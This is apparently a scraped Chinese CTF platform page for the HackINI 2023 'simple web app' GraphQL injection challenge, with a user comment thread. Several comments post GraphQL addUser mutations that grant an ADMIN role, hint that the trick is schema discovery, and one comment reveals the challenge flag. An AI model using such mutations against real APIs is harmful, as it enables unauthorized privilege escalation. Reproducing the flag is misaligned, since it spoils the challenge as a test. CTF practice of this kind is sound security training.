simple web appWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 229
提  示:
描  述:
Yet another injection.
评论
Linyuan0624 3月前

{"query": "mutation { addUser(username: \"admin\", password: \"admin123\", email: \"admin@example.com\", role: ADMIN) }"}

回复 0

WCRH 1年前

难度过高

回复 0

vincentshine 1年前

前端js 直接拼graphql 有点离谱

回复 2

xiaoxiao972521 1年前

mutation AddUser { addUser(username: "admin3", password: "admin3", email: "newuser@example.com", role: ADMIN) }

回复 0

123刹那 1年前

graphql第一搞这个,有点吃力哈哈,看了wp

回复 0

007 1年前

shellmates{yoU_$hOU1d_$3cuR3_Y0UR_Gr4phqL_4pI}

回复 0

zouu 1年前

想办法找到graphql的schema就行了

回复 0

.⎛⎝•̀ω•́⎠⎞. 2年前

不过我发现注册用户时用admin空格,可以注册一个没有admin权限的admin账号

回复 0

FADogeCTF 2年前

graphql注入

回复 2

chaoge 2年前

找到schema,通过addUser写入admin角色。

回复 0

WriteUp

image
sean

3 金币

评分(0)

暂无评分

解题动态

浪儿 攻破了该题 1天前
wangmazikkll 攻破了该题 2天前
hdcc1 攻破了该题 6天前
ksw0513 攻破了该题 18天前
13615049106 攻破了该题 20天前
asdliuyan 攻破了该题 21天前
zhmiha 攻破了该题 22天前
KingOfDark 攻破了该题 24天前
bugw 攻破了该题 1月前
XLDXL 攻破了该题 1月前
liliy 攻破了该题 1月前
ctf菜鸟 攻破了该题 1月前
xi4ao 攻破了该题 1月前
JLing 攻破了该题 1月前
fenrir 攻破了该题 1月前
TXX2025 攻破了该题 1月前
pudding2024 攻破了该题 1月前
Q-Larry 攻破了该题 1月前
houst 攻破了该题 1月前
DUa 攻破了该题 1月前
问题反馈